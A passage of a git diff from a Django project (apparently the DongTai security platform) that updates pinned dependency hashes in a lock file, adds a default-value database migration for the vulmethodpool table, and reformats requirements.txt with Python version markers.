"sha256:bc33fc20ddfd89b86b7710142963490d8c4ee8307ed6cc5e189a58fa72390eb9", + "sha256:cfe6d8b293d123255fd3b475b5f4e851eb5cbaee2064c8933aa27344381744ae", + "sha256:d16ac5ab3d9db78fed40c884d67079524e4cf8276639211ad9e6fa73e727727e" + ], + "index": "pypi", + "markers": "python_version >= '3.7'", + "version": "==0.19.1" + }, + "python-crontab": { + "hashes": [ + "sha256:6d5ba3c190ec76e4d252989a1644fcb233dbf53fbc8fceeb9febe1657b9fb1d4", + "sha256:79fb7465039ddfd4fb93d072d6ee0d45c1ac8bf1597f0686ea14fd4361dba379" + ], + "version": "==3.0.0" + }, + "python-dateutil": { + "hashes": [ + "sha256:0123cacc1627ae19ddf3c27a5de5bd67ee4586fbdd6440d9748f8abb483d3e86", + "sha256:961d03dc3453ebbc59dbdea9e4e11c5651520a876d0f4db161e8674aae935da9" + ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", + "version": "==2.8.2" + }, + "python-docx": { + "hashes": [ + "sha256:1105d233a0956dd8dd1e710d20b159e2d72ac3c301041b95f4d4ceb3e0ebebc4" + ], + "index": "pypi", + "version": "==0.8.11" + }, + "python-json-logger": { + "hashes": [ + "sha256:23e7ec02d34237c5aa1e29a070193a4ea87583bb4e7f8fd06d3de8264c4b2e1c", + "sha256:f380b826a991ebbe3de4d897aeec42760035ac760345e57b812938dc8b35e2bd" + ], + "index": "pypi", + "markers": "python_version >= '3.6'", + "version": "==2.0.7" + }, + "pytz": { + "hashes": [ + "sha256:222439474e9c98fced559f1709d89e6c9cbf8d79c794ff3eb9f8800064291427", + "sha256:e89512406b793ca39f5971bc999cc538ce125c0e51c27941bef4568b460095e2" + ], + "index": "pypi", + "version": "==2022.6" + }, + "pyyaml": { + "hashes": [ + "sha256:062582fca9fabdd2c8b54a3ef1c978d786e0f6b3a1510e0ac93ef59e0ddae2bc", + "sha256:1635fd110e8d85d55237ab316b5b011de701ea0f29d07611174a1b42f1444741", + "sha256:184c5108a2aca3c5b3d3bf9395d50893a7ab82a38004c8f61c258d4428e80206", + "sha256:18aeb1bf9a78867dc38b259769503436b7c72f7a1f1f4c93ff9a17de54319b27", + "sha256:1d4c7e777c441b20e32f52bd377e0c409713e8bb1386e1099c2415f26e479595", + "sha256:1e2722cc9fbb45d9b87631ac70924c11d3a401b2d7f410cc0e3bbf249f2dca62", + "sha256:1fe35611261b29bd1de0070f0b2f47cb6ff71fa6595c077e42bd0c419fa27b98", + "sha256:28c119d996beec18c05208a8bd78cbe4007878c6dd15091efb73a30e90539696", + "sha256:42f8152b8dbc4fe7d96729ec2b99c7097d656dc1213a3229ca5383f973a5ed6d", + "sha256:4fb147e7a67ef577a588a0e2c17b6db51dda102c71de36f8549b6816a96e1867", + "sha256:50550eb667afee136e9a77d6dc71ae76a44df8b3e51e41b77f6de2932bfe0f47", + "sha256:510c9deebc5c0225e8c96813043e62b680ba2f9c50a08d3724c7f28a747d1486", + "sha256:5773183b6446b2c99bb77e77595dd486303b4faab2b086e7b17bc6bef28865f6", + "sha256:596106435fa6ad000c2991a98fa58eeb8656ef2325d7e158344fb33864ed87e3", + "sha256:6965a7bc3cf88e5a1c3bd2e0b5c22f8d677dc88a455344035f03399034eb3007", + "sha256:69b023b2b4daa7548bcfbd4aa3da05b3a74b772db9e23b982788168117739938", + "sha256:704219a11b772aea0d8ecd7058d0082713c3562b4e271b849ad7dc4a5c90c13c", + "sha256:7e07cbde391ba96ab58e532ff4803f79c4129397514e1413a7dc761ccd755735", + "sha256:81e0b275a9ecc9c0c0c07b4b90ba548307583c125f54d5b6946cfee6360c733d", + "sha256:9046c58c4395dff28dd494285c82ba00b546adfc7ef001486fbf0324bc174fba", + "sha256:9eb6caa9a297fc2c2fb8862bc5370d0303ddba53ba97e71f08023b6cd73d16a8", + "sha256:a0cd17c15d3bb3fa06978b4e8958dcdc6e0174ccea823003a106c7d4d7899ac5", + "sha256:afd7e57eddb1a54f0f1a974bc4391af8bcce0b444685d936840f125cf046d5bd", + "sha256:b1275ad35a5d18c62a7220633c913e1b42d44b46ee12554e5fd39c70a243d6a3", + "sha256:b786eecbdf8499b9ca1d697215862083bd6d2a99965554781d0d8d1ad31e13a0", + "sha256:ba336e390cd8e4d1739f42dfe9bb83a3cc2e80f567d8805e11b46f4a943f5515", + "sha256:baa90d3f661d43131ca170712d903e6295d1f7a0f595074f151c0aed377c9b9c", + "sha256:bc1bf2925a1ecd43da378f4db9e4f799775d6367bdb94671027b73b393a7c42c", + "sha256:bd4af7373a854424dabd882decdc5579653d7868b8fb26dc7d0e99f823aa5924", + "sha256:bf07ee2fef7014951eeb99f56f39c9bb4af143d8aa3c21b1677805985307da34", + "sha256:bfdf460b1736c775f2ba9f6a92bca30bc2095067b8a9d77876d1fad6cc3b4a43", + "sha256:c8098ddcc2a85b61647b2590f825f3db38891662cfc2fc776415143f599bb859", + "sha256:d2b04aac4d386b172d5b9692e2d2da8de7bfb6c387fa4f801fbf6fb2e6ba4673", + "sha256:d858aa552c999bc8a8d57426ed01e40bef403cd8ccdd0fc5f6f04a00414cac2a", + "sha256:f003ed9ad21d6a4713f0a9b5a7a0a79e08dd0f221aff4525a2be4c346ee60aab", + "sha256:f22ac1c3cac4dbc50079e965eba2c1058622631e526bd9afd45fedd49ba781fa", + "sha256:faca3bdcf85b2fc05d06ff3fbc1f83e1391b3e724afa3feba7d13eeab355484c", + "sha256:fca0e3a251908a499833aa292323f32437106001d436eca0e6e7833256674585", + "sha256:fd1592b3fdf65fff2ad0004b5e363300ef59ced41c2e6b3a99d4089fa8c5435d", + "sha256:fd66fc5d0da6d9815ba2cebeb4205f95818ff4b79c3ebe268e75d961704af52f" + ], + "markers": "python_version >= '3.6'", + "version": "==6.0.1" + }, + "redis": { + "hashes": [ + "sha256:68226f7ede928db8302f29ab088a157f41061fa946b7ae865452b6d7838bbffb", + "sha256:da92a39fec86438d3f1e2a1db33c312985806954fe860120b582a8430e231d8f" + ], + "index": "pypi", + "markers": "python_version >= '3.7'", + "version": "==4.4.4" + }, + "requests": { + "hashes": [ + "sha256:58cd2187c01e70e6e26505bca751777aa9f2ee0b7f4300988b709f44e013003f", + "sha256:942c5a758f98d790eaed1a29cb6eefc7ffb0d1cf7af05c3d2791656dbd6ad1e1" + ], + "index": "pypi", + "markers": "python_version >= '3.7'", + "version": "==2.31.0" + }, + "result": { + "hashes": [ + "sha256:c48c909e92181a075ba358228a3fe161e26d205dad416ad81f27f23515a5626d", + "sha256:d6a6258f32c057a4e0478999c6ce43dcadaf8ea435f58ac601ae2768f93ef243" + ], + "index": "pypi", + "markers": "python_version >= '3.7'", + "version": "==0.8.0" + }, + "s3transfer": { + "hashes": [ + "sha256:b014be3a8a2aab98cfe1abc7229cc5a9a0cf05eb9c1f2b86b230fd8df3f78084", + "sha256:cab66d3380cca3e70939ef2255d01cd8aece6a4907a9528740f668c4b0611861" + ], + "markers": "python_version >= '3.7'", + "version": "==0.6.2" + }, + "scipy": { + "hashes": [ + "sha256:0f3261f14b767b316d7137c66cc4f33a80ea05841b9c87ad83a726205b901423", + "sha256:10eb6af2f751aa3424762948e5352f707b0dece77288206f227864ddf675aca0", + "sha256:1342ca385c673208f32472830c10110a9dcd053cf0c4b7d4cd7026d0335a6c1d", + "sha256:214cdf04bbae7a54784f8431f976704ed607c4bc69ba0d5d5d6a9df84374df76", + "sha256:2b997a5369e2d30c97995dcb29d638701f8000d04df01b8e947f206e5d0ac788", + "sha256:2c91cf049ffb5575917f2a01da1da082fd24ed48120d08a6e7297dfcac771dcd", + "sha256:3aeb87661de987f8ec56fa6950863994cd427209158255a389fc5aea51fa7055", + "sha256:4447ad057d7597476f9862ecbd9285bbf13ba9d73ce25acfa4e4b11c6801b4c9", + "sha256:542a757e2a6ec409e71df3d8fd20127afbbacb1c07990cb23c5870c13953d899", + "sha256:8d9886f44ef8c9e776cb7527fb01455bf4f4a46c455c4682edc2c2cc8cd78562", + "sha256:90d3b1364e751d8214e325c371f0ee0dd38419268bf4888b2ae1040a6b266b2a", + "sha256:95763fbda1206bec41157582bea482f50eb3702c85fffcf6d24394b071c0e87a", + "sha256:ac74b1512d38718fb6a491c439aa7b3605b96b1ed3be6599c17d49d6c60fca18", + "sha256:afdb0d983f6135d50770dd979df50bf1c7f58b5b33e0eb8cf5c73c70600eae1d", + "sha256:b0620240ef445b5ddde52460e6bc3483b7c9c750275369379e5f609a1050911c", + "sha256:b133f237bd8ba73bad51bc12eb4f2d84cbec999753bf25ba58235e9fc2096d80", + "sha256:b29318a5e39bd200ca4381d80b065cdf3076c7d7281c5e36569e99273867f61d", + "sha256:b8425fa963a32936c9773ee3ce44a765d8ff67eed5f4ac81dc1e4a819a238ee9", + "sha256:d2b813bfbe8dec6a75164523de650bad41f4405d35b0fa24c2c28ae07fcefb20", + "sha256:d690e1ca993c8f7ede6d22e5637541217fc6a4d3f78b3672a6fe454dbb7eb9a7", + "sha256:e367904a0fec76433bf3fbf3e85bf60dae8e9e585ffd21898ab1085a29a04d16", + "sha256:ea932570b1c2a30edafca922345854ff2cd20d43cd9123b6dacfdecebfc1a80b", + "sha256:f28f1f6cfeb48339c192efc6275749b2a25a7e49c4d8369a28b6591da02fbc9a", + "sha256:f73102f769ee06041a3aa26b5841359b1a93cc364ce45609657751795e8f4a4a", + "sha256:fa4909c6c20c3d91480533cddbc0e7c6d849e7d9ded692918c76ce5964997898" + ], + "markers": "python_version < '3.13' and python_version >= '3.9'", + "version": "==1.11.2" + }, + "setuptools": { + "hashes": [ + "sha256:d0b9a8433464d5800cbe05094acf5c6d52a91bfac9b52bcfc4d41382be5d5d31", + "sha256:e197a19aa8ec9722928f2206f8de752def0e4c9fc6953527360d1c36d94ddb2f" + ], + "index": "pypi", + "markers": "python_version >= '3.7'", + "version": "==65.5.1" + }, + "shortuuid": { + "hashes": [ + "sha256:27ea8f28b1bd0bf8f15057a3ece57275d2059d2b0bb02854f02189962c13b6aa", + "sha256:fc75f2615914815a8e4cb1501b3a513745cb66ef0fd5fc6fb9f8c3fa3481f789" + ], + "index": "pypi", + "markers": "python_version >= '3.5'", + "version": "==1.0.11" + }, + "simhash": { + "hashes": [ + "sha256:49c5d81f31254f7e3f71dc2f5a245625c3d6143584478fdf4ffd2e63e4929366", + "sha256:533bc8cf41e4e6dd83f0b1847363516bf3323e0fa92e63d9e6df4e281e882e1b", + "sha256:634f41eb63d1c2dd1719459a859a985b2e0f2457670c9739c4d831a218409e8c", + "sha256:968de16c82c227a631aa00e57ab58f9e4ee9e47e8408486199a9eb59c1d6979b", + "sha256:a1dd9c4e2688fac260b5a810434326395bd23a566f5a8d5b9eac1336cc746d7f" + ], + "index": "pypi", + "version": "==2.1.2" + }, + "six": { + "hashes": [ + "sha256:30639c035cdb23534cd4aa2dd52c3bf48f06e5f4a941509c8bafd8ce11080259", + "sha256:8b74bedcbbbaca38ff6d7491d76f2b06b3592611af620f8426e82dddb04a5ced" + ], + "index": "pypi", + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", + "version": "==1.15.0" + }, + "sqlparse": { + "hashes": [ + "sha256:5430a4fe2ac7d0f93e66f1efc6e1338a41884b7ddf2a350cedd20ccc4d9d28f3", + "sha256:d446183e84b8349fa3061f0fe7f06ca94ba65b426946ffebe6e3e8295332420c" + ], + "markers": "python_version >= '3.5'", + "version": "==0.4.4" + }, + "tablib": { + "extras": ["html", "ods", "xls", "xlsx", "yaml"], + "hashes": [ + "sha256:9821caa9eca6062ff7299fa645e737aecff982e6b2b42046928a6413c8dabfd9", + "sha256:f6661dfc45e1d4f51fa8a6239f9c8349380859a5bfaa73280645f046d6c96e33" + ], + "markers": "python_version >= '3.8'", + "version": "==3.5.0" + }, + "tomli": { + "hashes": [ + "sha256:939de3e7a6161af0c887ef91b7d41a53e7c5a1ca976325f429cb46ea9bc30ecc", + "sha256:de526c12914f0c550d15924c62d72abc48d6fe7364aa87328337a31007fe8a4f" + ], + "markers": "python_version < '3.11'", + "version": "==2.0.1" + }, + "tornado": { + "hashes": [ + "sha256:1bd19ca6c16882e4d37368e0152f99c099bad93e0950ce55e71daed74045908f", + "sha256:22d3c2fa10b5793da13c807e6fc38ff49a4f6e1e3868b0a6f4164768bb8e20f5", + "sha256:502fba735c84450974fec147340016ad928d29f1e91f49be168c0a4c18181e1d", + "sha256:65ceca9500383fbdf33a98c0087cb975b2ef3bfb874cb35b8de8740cf7f41bd3", + "sha256:71a8db65160a3c55d61839b7302a9a400074c9c753040455494e2af74e2501f2", + "sha256:7ac51f42808cca9b3613f51ffe2a965c8525cb1b00b7b2d56828b8045354f76a", + "sha256:7d01abc57ea0dbb51ddfed477dfe22719d376119844e33c661d873bf9c0e4a16", + "sha256:805d507b1f588320c26f7f097108eb4023bbaa984d63176d1652e184ba24270a", + "sha256:9dc4444c0defcd3929d5c1eb5706cbe1b116e762ff3e0deca8b715d14bf6ec17", + "sha256:ceb917a50cd35882b57600709dd5421a418c29ddc852da8bcdab1f0db33406b0", + "sha256:e7d8db41c0181c80d76c982aacc442c0783a2c54d6400fe028954201a2e032fe" + ], + "markers": "python_version >= '3.8'", + "version": "==6.3.3" + }, + "types-awscrt": { + "hashes": [ + "sha256:0e31d7ba44e1898af37d224b94d28ffaef19baf89bb18ea2599de9ac0910a07f", + "sha256:eaef60422cf716b4ae216f164b74d679c82b0d9c53db380a37deb29ae5579b1b" + ], + "markers": "python_version >= '3.7' and python_version < '4.0'", + "version": "==0.19.0" + }, + "types-pymysql": { + "hashes": [ + "sha256:72bdaecb88de4a30bc3e1842e1d4522ceb3c4b2e883a6a2a7a7162775dd27b93", + "sha256:9aec9ee0453314d477ef26e5832b4a992bc4cc3557358d62b0fe4af760a7728f" + ], + "index": "pypi", + "version": "==1.1.0.1" + }, + "types-pyopenssl": { + "hashes": [ + "sha256:19536aa3debfbe25a918cf0d898e9f5fbbe6f3594a429da7914bf331deb1b342", + "sha256:6a010dac9ecd42b582d7dd2cc3e9e40486b79b3b64bb2fffba1474ff96af906d" + ], + "version": "==23.2.0.2" + }, + "types-python-dateutil": { + "hashes": [ + "sha256:1f4f10ac98bb8b16ade9dbee3518d9ace017821d94b057a425b069f834737f4b", + "sha256:f977b8de27787639986b4e28963263fd0e5158942b3ecef91b9335c130cb1ce9" + ], + "index": "pypi", + "version": "==2.8.19.14" + }, + "types-pytz": { + "hashes": [ + "sha256:1a7b8d4aac70981cfa24478a41eadfcd96a087c986d6f150d77e3ceb3c2bdfab", + "sha256:65152e872137926bb67a8fe6cc9cfd794365df86650c5d5fdc7b167b0f38892e" + ], + "version": "==2023.3.0.1" + }, + "types-pyyaml": { + "hashes": [ + "sha256:7d340b19ca28cddfdba438ee638cd4084bde213e501a3978738543e27094775b", + "sha256:a461508f3096d1d5810ec5ab95d7eeecb651f3a15b71959999988942063bf01d" + ], + "index": "pypi", + "version": "==6.0.12.11" + }, + "types-redis": { + "hashes": [ + "sha256:4f662060247a2363c7a8f0b7e52915d68960870ff16a749a891eabcf87ed0be4", + "sha256:5f179d10bd3ca995a8134aafcddfc3e12d52b208437c4529ef27e68acb301f38" + ], + "index": "pypi", + "version": "==4.6.0.5" + }, + "types-requests": { + "hashes": [ + "sha256:56d181c85b5925cbc59f4489a57e72a8b2166f18273fd8ba7b6fe0c0b986f12a", + "sha256:6aa3f7faf0ea52d728bb18c0a0d1522d9bfd8c72d26ff6f61bfc3d06a411cf40" + ], + "index": "pypi", + "version": "==2.31.0.2" + }, + "types-s3transfer": { + "hashes": [ + "sha256:1068877b6e59be5226fa3006ae64371ac9d5bc590dfdbd9c66fd0a075d3254ac", + "sha256:4ba9b483796fdcd026aa162ee03bdcedd2bf7d08e9387c820dcdd158b0102057" + ], + "markers": "python_version >= '3.7' and python_version < '4.0'", + "version": "==0.6.2" + }, + "types-urllib3": { + "hashes": [ + "sha256:229b7f577c951b8c1b92c1bc2b2fdb0b49847bd2af6d1cc2a2e3dd340f3bda8f", + "sha256:9683bbb7fb72e32bfe9d2be6e04875fbe1b3eeec3cbb4ea231435aa7fd6b4f0e" + ], + "index": "pypi", + "version": "==1.26.25.14" + }, + "typing-extensions": { + "hashes": [ + "sha256:440d5dd3af93b060174bf433bccd69b0babc3b15b1a8dca43789fd7f61514b36", + "sha256:b75ddc264f0ba5615db7ba217daeb99701ad295353c45f9e95963337ceeeffb2" + ], + "index": "pypi", + "markers": "python_version >= '3.7'", + "version": "==4.7.1" + }, + "typing-inspect": { + "hashes": [ + "sha256:9ee6fc59062311ef8547596ab6b955e1b8aa46242d854bfc78f4f6b0eff35f9f", + "sha256:b23fc42ff6f6ef6954e4852c1fb512cdd18dbea03134f91f856a95ccc9461f78" + ], + "version": "==0.9.0" + }, + "tzdata": { + "hashes": [ + "sha256:11ef1e08e54acb0d4f95bdb1be05da659673de4acbd21bf9c69e94cc5e907a3a", + "sha256:7e65763eef3120314099b6939b5546db7adce1e7d6f2e179e3df563c70511eda" + ], + "markers": "python_version >= '2'", + "version": "==2023.3" + }, + "uritemplate": { + "hashes": [ + "sha256:4346edfc5c3b79f694bccd6d6099a322bbeb628dbf2cd86eea55a456ce5124f0", + "sha256:830c08b8d99bdd312ea4ead05994a38e8936266f84b9a7878232db50b044e02e" + ], + "markers": "python_version >= '3.6'", + "version": "==4.1.1" + }, + "urllib3": { + "hashes": [ + "sha256:753a0374df26658f99d826cfe40394a686d05985786d946fbe4165b5148f5a7c", + "sha256:a7acd0977125325f516bda9735fa7142b909a8d01e8b2e4c8108d0984e6e0098" + ], + "index": "pypi", + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' and python_version < '4'", + "version": "==1.26.5" + }, + "uwsgi": { + "hashes": [ + "sha256:35a30d83791329429bc04fe44183ce4ab512fcf6968070a7bfba42fc5a0552a9" + ], + "index": "pypi", + "version": "==2.0.21" + }, + "uwsgitop": { + "hashes": [ + "sha256:99ca245119e4a0600840a62b7b4e020c9870fe90952b24eecfff0c9090c75d14" + ], + "index": "pypi", + "version": "==0.11" + }, + "vine": { + "hashes": [ + "sha256:4c9dceab6f76ed92105027c49c823800dd33cacce13bdedc5b914e3514b7fb30", + "sha256:7d3b1624a953da82ef63462013bbd271d3eb75751489f9807598e8f340bd637e" + ], + "markers": "python_version >= '3.6'", + "version": "==5.0.0" + }, + "wcwidth": { + "hashes": [ + "sha256:795b138f6875577cd91bba52baf9e445cd5118fd32723b460e30a0af30ea230e", + "sha256:a5220780a404dbe3353789870978e472cfe477761f06ee55077256e509b156d0" + ], + "version": "==0.2.6" + }, + "xlrd": { + "hashes": [ + "sha256:6a33ee89877bd9abc1158129f6e94be74e2679636b8a205b43b85206c3f0bbdd", + "sha256:f72f148f54442c6b056bf931dbc34f986fd0c3b0b6b5a58d013c9aef274d0c88" + ], + "version": "==2.0.1" + }, + "xlwt": { + "hashes": [ + "sha256:a082260524678ba48a297d922cc385f58278b8aa68741596a87de01a9c628b2e", + "sha256:c59912717a9b28f1a3c2a98fd60741014b06b043936dcecbc113eaaada156c88" + ], + "index": "pypi", + "version": "==1.3.0" + }, + "zope.event": { + "hashes": [ + "sha256:2832e95014f4db26c47a13fdaef84cef2f4df37e66b59d8f1f4a8f319a632c26", + "sha256:bac440d8d9891b4068e2b5a2c5e2c9765a9df762944bda6955f96bb9b91e67cd" + ], + "markers": "python_version >= '3.7'", + "version": "==5.0" + }, + "zope.interface": { + "hashes": [ + "sha256:042f2381118b093714081fd82c98e3b189b68db38ee7d35b63c327c470ef8373", + "sha256:0ec9653825f837fbddc4e4b603d90269b501486c11800d7c761eee7ce46d1bbb", + "sha256:12175ca6b4db7621aedd7c30aa7cfa0a2d65ea3a0105393e05482d7a2d367446", + "sha256:1592f68ae11e557b9ff2bc96ac8fc30b187e77c45a3c9cd876e3368c53dc5ba8", + "sha256:23ac41d52fd15dd8be77e3257bc51bbb82469cf7f5e9a30b75e903e21439d16c", + "sha256:424d23b97fa1542d7be882eae0c0fc3d6827784105264a8169a26ce16db260d8", + "sha256:4407b1435572e3e1610797c9203ad2753666c62883b921318c5403fb7139dec2", + "sha256:48f4d38cf4b462e75fac78b6f11ad47b06b1c568eb59896db5b6ec1094eb467f", + "sha256:4c3d7dfd897a588ec27e391edbe3dd320a03684457470415870254e714126b1f", + "sha256:5171eb073474a5038321409a630904fd61f12dd1856dd7e9d19cd6fe092cbbc5", + "sha256:5a158846d0fca0a908c1afb281ddba88744d403f2550dc34405c3691769cdd85", + "sha256:6ee934f023f875ec2cfd2b05a937bd817efcc6c4c3f55c5778cbf78e58362ddc", + "sha256:790c1d9d8f9c92819c31ea660cd43c3d5451df1df61e2e814a6f99cebb292788", + "sha256:809fe3bf1a91393abc7e92d607976bbb8586512913a79f2bf7d7ec15bd8ea518", + "sha256:87b690bbee9876163210fd3f500ee59f5803e4a6607d1b1238833b8885ebd410", + "sha256:89086c9d3490a0f265a3c4b794037a84541ff5ffa28bb9c24cc9f66566968464", + "sha256:99856d6c98a326abbcc2363827e16bd6044f70f2ef42f453c0bd5440c4ce24e5", + "sha256:aab584725afd10c710b8f1e6e208dbee2d0ad009f57d674cb9d1b3964037275d", + "sha256:af169ba897692e9cd984a81cb0f02e46dacdc07d6cf9fd5c91e81f8efaf93d52", + "sha256:b39b8711578dcfd45fc0140993403b8a81e879ec25d53189f3faa1f006087dca", + "sha256:b3f543ae9d3408549a9900720f18c0194ac0fe810cecda2a584fd4dca2eb3bb8", + "sha256:d0583b75f2e70ec93f100931660328965bb9ff65ae54695fb3fa0a1255daa6f2", + "sha256:dfbbbf0809a3606046a41f8561c3eada9db811be94138f42d9135a5c47e75f6f", + "sha256:e538f2d4a6ffb6edfb303ce70ae7e88629ac6e5581870e66c306d9ad7b564a58", + "sha256:eba51599370c87088d8882ab74f637de0c4f04a6d08a312dce49368ba9ed5c2a", + "sha256:ee4b43f35f5dc15e1fec55ccb53c130adb1d11e8ad8263d68b1284b66a04190d", + "sha256:f2363e5fd81afb650085c6686f2ee3706975c54f331b426800b53531191fdf28", + "sha256:f299c020c6679cb389814a3b81200fe55d428012c5e76da7e722491f5d205990", + "sha256:f72f23bab1848edb7472309e9898603141644faec9fd57a823ea6b4d1c4c8995", + "sha256:fa90bac61c9dc3e1a563e5babb3fd2c0c1c80567e815442ddbe561eadc803b30" + ], + "markers": "python_version >= '3.7'", + "version": "==6.0" + } + }, + "develop": {} } diff --git a/dongtai_common/migrations/0014_auto_20230828_1132.py b/dongtai_common/migrations/0014_auto_20230828_1132.py index 456c5c1e0..254bd63d2 100644 --- a/dongtai_common/migrations/0014_auto_20230828_1132.py +++ b/dongtai_common/migrations/0014_auto_20230828_1132.py @@ -2,6 +2,7 @@ import django.db.models.deletion from django.db import migrations, models +from django_add_default_value import AddDefaultValue class Migration(migrations.Migration): @@ -67,4 +68,5 @@ class Migration(migrations.Migration): model_name="vulmethodpool", index=models.Index(fields=["vul_id", "update_time"], name="iast_agent__vul_id_47b430_idx"), ), + AddDefaultValue(model_name="vulmethodpool", name="method_pool_id", value=0), ] diff --git a/requirements.txt b/requirements.txt index 93347062e..9496a22dd 100644 --- a/requirements.txt +++ b/requirements.txt @@ -2,150 +2,148 @@ aliyun-python-sdk-core==2.13.36 aliyun-python-sdk-core-v3==2.13.33 aliyun-python-sdk-kms==2.16.1 -amqp==5.1.1 ; python_version >= '3.6' -annotated-types==0.5.0 ; python_version >= '3.7' -asgiref==3.7.2 -async-timeout==4.0.2 ; python_version >= '3.6' -attrs==23.1.0 ; python_version >= '3.7' -autopep8==2.0.2 ; python_version >= '3.6' -billiard==4.1.0 ; python_version >= '3.7' -boto3==1.24.59 -boto3-stubs==1.28.2 -botocore==1.27.91 -botocore-stubs==1.29.165 -celery==5.3.0rc1 -celery-singleton==0.3.1 -certifi==2023.7.22 +amqp==5.1.1; python_version >= '3.6' +asgiref==3.7.2; python_version >= '3.7' +async-timeout==4.0.3; python_version >= '3.7' +attrs==23.1.0; python_version >= '3.7' +autopep8==2.0.4; python_version >= '3.6' +billiard==4.1.0; python_version >= '3.7' +boto3==1.24.59; python_version >= '3.7' +boto3-stubs==1.28.35; python_version >= '3.7' +botocore==1.27.91; python_version >= '3.7' +botocore-stubs==1.31.35; python_version >= '3.7' and python_version < '4.0' +celery==5.3.0rc1; python_version >= '3.7' +celery-singleton==0.3.1; python_version >= '3.6' and python_version < '4.0' +certifi==2023.7.22; python_version >= '3.6' cffi==1.15.1 -chardet==5.1.0 -charset-normalizer==3.2.0 ; python_full_version >= '3.7.0' -click==8.1.4 ; python_version >= '3.7' -click-didyoumean==0.3.0 ; python_full_version >= '3.6.2' and python_full_version < '4.0.0' +chardet==5.2.0; python_version >= '3.7' +charset-normalizer==3.2.0; python_full_version >= '3.7.0' +click==8.1.7; python_version >= '3.7' +click-didyoumean==0.3.0; python_full_version >= '3.6.2' and python_full_version < '4.0.0' click-plugins==1.1.1 -click-repl==0.3.0 ; python_version >= '3.6' +click-repl==0.3.0; python_version >= '3.6' crcmod==1.7 -cryptography==41.0.3 -dataclasses-json==0.5.9 +cryptography==41.0.3; python_version >= '3.7' +dataclasses-json==0.5.14; python_version < '3.13' and python_version >= '3.7' ddt==1.6.0 -defusedxml==0.7.1 ; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' -diff-match-patch==20230430 ; python_version >= '3.7' -django==3.2.20 +defusedxml==0.7.1; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' +diff-match-patch==20230430; python_version >= '3.7' +django==3.2.20; python_version >= '3.6' +django-add-default-value==0.10.0 django-celery-beat==2.2.0 -django-cors-headers==4.2.0 +django-cors-headers==4.2.0; python_version >= '3.8' django-cprofile-middleware==1.0.5 django-elasticsearch-dsl==7.2.2 -django-filter==23.2 -django-health-check==3.17.0 -django-import-export==2.5.0 -django-mock-queries==v2.1.7 +django-filter==23.2; python_version >= '3.7' +django-health-check==3.17.0; python_version >= '3.8' +django-import-export==2.5.0; python_version >= '3.5' +django-mock-queries==2.1.7 django-modeltranslation==0.17.7 django-prometheus==2.3.1 django-ranged-response==0.2.0 -django-redis==5.2.0 +django-redis==5.2.0; python_version >= '3.6' django-rest-framework-proxy==1.6.0 -django-seriously==0.4.0 -django-silk==5.0.3 +django-seriously==0.4.3; python_version >= '3.6' +django-silk==5.0.3; python_version >= '3.7' django-simple-captcha==0.5.18 -django-stubs[compatible-mypy]==1.15.0 -django-stubs-ext==4.2.2 ; python_version >= '3.8' -django-timezone-field==4.2.3 ; python_version >= '3.5' +django-stubs[compatible-mypy]==1.15.0; python_version >= '3.7' +django-stubs-ext==4.2.2; python_version >= '3.8' +django-timezone-field==4.2.3; python_version >= '3.5' django-utils==0.0.2 -django-utils-six==2.0 +django-utils-six==2.0; python_version >= '3.6' and python_version < '4.0' django-xff==1.4.0 -djangorestframework==3.12.4 -djangorestframework-dataclasses==1.2.0 -djangorestframework-stubs[compatible-mypy]==1.9.1 +djangorestframework==3.12.4; python_version >= '3.5' +djangorestframework-dataclasses==1.3.0; python_version >= '3.7' +djangorestframework-stubs[compatible-mypy]==1.9.1; python_version >= '3.7' docxcompose==1.3.4 docxtpl==0.16.0 -drf-spectacular==0.22.1 -elasticsearch==7.17.7 -elasticsearch-dsl==7.4.1 ; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' -et-xmlfile==1.1.0 ; python_version >= '3.6' -flower==2.0.0 -gevent==22.10.2 -gprof2dot==2022.7.29 ; python_version >= '2.7' -greenlet==2.0.2 ; platform_python_implementation == 'CPython' -gunicorn==20.1.0 -humanize==4.7.0 ; python_version >= '3.8' -id-validator==1.0.20 -idna==2.10 -inflection==0.5.1 ; python_version >= '3.5' -jinja2==3.1.2 ; python_version >= '3.7' -jmespath==0.10.0 ; python_version >= '2.6' and python_version not in '3.0, 3.1, 3.2, 3.3' -jq==1.3.0 -jsonlog==4.0.0 -jsonschema==4.17.0 -kombu==5.3.1 ; python_version >= '3.8' -lxml==4.9.1 -marisa-trie==0.8.0 +drf-spectacular==0.22.1; python_version >= '3.6' +elasticsearch==7.17.7; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' and python_version < '4' +elasticsearch-dsl==7.4.1; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' +et-xmlfile==1.1.0; python_version >= '3.6' +flower==2.0.1; python_version >= '3.7' +gevent==22.10.2; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4, 3.5' +gprof2dot==2022.7.29; python_version >= '2.7' +greenlet==2.0.2; platform_python_implementation == 'CPython' +gunicorn==20.1.0; python_version >= '3.5' +humanize==4.8.0; python_version >= '3.8' +id-validator==1.0.20; python_version >= '3' +idna==2.10; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' +inflection==0.5.1; python_version >= '3.5' +jinja2==3.1.2; python_version >= '3.7' +jmespath==0.10.0; python_version >= '2.6' and python_version not in '3.0, 3.1, 3.2, 3.3' +jq==1.3.0; python_version >= '3.5' +jsonlog==4.0.0; python_version >= '3.6' and python_version < '4.0' +jsonschema==4.17.0; python_version >= '3.7' +kombu==5.3.1; python_version >= '3.8' +lxml==4.9.1; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' +marisa-trie==0.8.0; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' markuppy==1.14 -markupsafe==2.1.3 ; python_version >= '3.7' -marshmallow==3.19.0 ; python_version >= '3.7' -marshmallow-enum==1.5.1 -mock==5.0.2 ; python_version >= '3.6' -model-bakery==1.12.0 ; python_version >= '3' -mypy==1.0.1 -mypy-extensions==1.0.0 ; python_version >= 